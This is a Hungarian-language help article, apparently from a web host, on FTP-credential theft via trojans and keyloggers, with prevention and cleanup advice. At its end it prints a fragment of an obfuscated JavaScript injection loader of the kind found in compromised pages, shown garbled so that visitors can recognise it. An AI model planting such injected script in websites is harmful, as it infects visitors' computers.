FTP-vírus fertőzés

Weboldalán idegen oldalak jelennek meg vagy az antivírus programja vírus jelenlétéről értesít amikor megnyitja az oldalát? Valószínűleg hacker támadás érte a webtárterületét. Ez a támadás elsősorban a számítógépen elhelyezett vírusok révén történhet meg. Általában jelszó lopó vagy keylogger vírus segítségével.

Támadási lehetőségek a weben és az FTP-én:
1.Támadás a jelszó lopó (password steeling) vírusokkal abban az esetben történhet ha a jelszó el van mentve.
2.Jelszó lehallgatása trójai (trojan) segítségével az FTP-kliens bejelentkezésénél.
3.A jelszó lehallgatása a lenyomott billentyűk logolása a számítógépén keylogger segítségével.

A támadás a következőképpen történhet:
A lehetséges támadások FTP-jére eredhetnek egy nem biztonságos számítógépről, amelyen a szokásos internetes böngészés közben véletlenül letölt egy trojai vírust vagy keyloggert. Az így megfertőzött (feltört) számítógép elküldi az érzékeny adatokat a potenciális támadónak. Abban az esetben, ha a számítógép meg van fertőzve (fel van törve) trójai vírussal, a vírusok két módon találhatják meg a jelszót. Az első lehetőség, hogy egy már mentett FTP-kliens kapcsolatban találja meg a jelszót. A második lehetőség, ha a jelszót beírja mikor csatlakozik az FTP-hez. Az első esetben a trójai talál tárolt relációt (olyan hely ahol a jelszavak tárolva vannak) a számítógépen, ha így van elrejtve a jelszó a csatlakozáshoz, a vírusnak nem jelent gondot ezt a jelszót megtalálni és a potenciális támadónak elküldeni. Ezért ajánlatos, hogy a jelszavakat a számítógépeken ne tároljuk. Így elkerülheti az FTP támadások első lehetőségét. A második lehetőség, amikor a keylogger észleli a lenyomott billentyűket és egy LOG fájlt csinál amit ezt követően elküld a támadónak. Ebből a log
fájlból aztán meg lehet állapítani minden a számítógépen lenyomott billentyűt így minden beírt jelszót is (nem csak az FTP!).

Hogyan lehet megakadályozni az FTP elleni támadásokat:
Az első szabály az FTP megvédéséhez semmilyen jelszót ne tároljunk a számítógépen. Főként semmilyen relációt ne helyezzünk el az FTP kliens bejelentkezéséről. Ha a jelszó nincs a számítógépén, akkor a legegyszerűbb vírus sem talál semmit és nem küldi el a támadónak az adatokat. Második szabály, az aktív és passzív védelem a számítógépén. Az aktív védelembe lehet besorolni tűzfalat (firewall), antivírus és anti-spyware és adware programokat. A passzív védelembe a számítógépre érkező az e-mailek mellékleteinek óvatos megnyitása vagy a böngészőben a potenciális veszélyes területek megnyitásának kerülése (warez oldalak, erotikus, illetve illegális tartalmak ........) tartozhat.

Hogyan távolítsuk el a vírust az oldalainkról:
Ha a webhely már vírussal fertőzött, azt azonnal el kell távolítani a weboldalról mert más felhasználók
webtárterületét és számítógépét is támadás érheti. Általában az a legjobb, ha az FTP teljes tartalmát   törli és az adatokat egy biztonsági mentésből újra feltölti. Ehhez biztosnak kell lennie abban, hogy a biztonsági mentés nem fertőzött, a weboldal nem volt megfertőzve vírussal a biztonsági mentés készítésekor. A fertőzött adatok törlésével és a mentésből származó eredeti adatok feltöltésével egy időben kell az FTP jelszót is megváltoztatni. Ha az eredeti jelszót meghagyná akkor megint támadás érné mert a támadónak az adatbázisában még tárolva van az eredeti jelszó. A fent említettek alapján szükséges átvizsgálni a számítógépet a számítógépére telepített antivírus, antispyware, és antiadware programokkal.

A vírus kódjainak amelyek az weboldalakba lehetnek beillesztve:
 
<!--[z0s]--><script>document.write(unescapess("%3Cscript%3Eif%28Qg
%21%3D1%29%7Bfunction%20JI%28fR%29%7Breturnfd%20fR%7Dtry%7Bfunc
n%20wcr%28jzA%29%7Breturn%20parseInt%28jzA%29%gf7Dvar%20XSf%3D

style="TEXT-ALIGN: justify">.7DVBy+%3DString.fromCharCode%28QdU%5BZSk%5D%5E132%2hh9%3B%7D
nt.write%28VBy%29%3B%7Dcatch%ds28nxu%29%7B%7D%7Dvar%20Qg%3D1
ript%3E"))</script><!--[/z0s]-->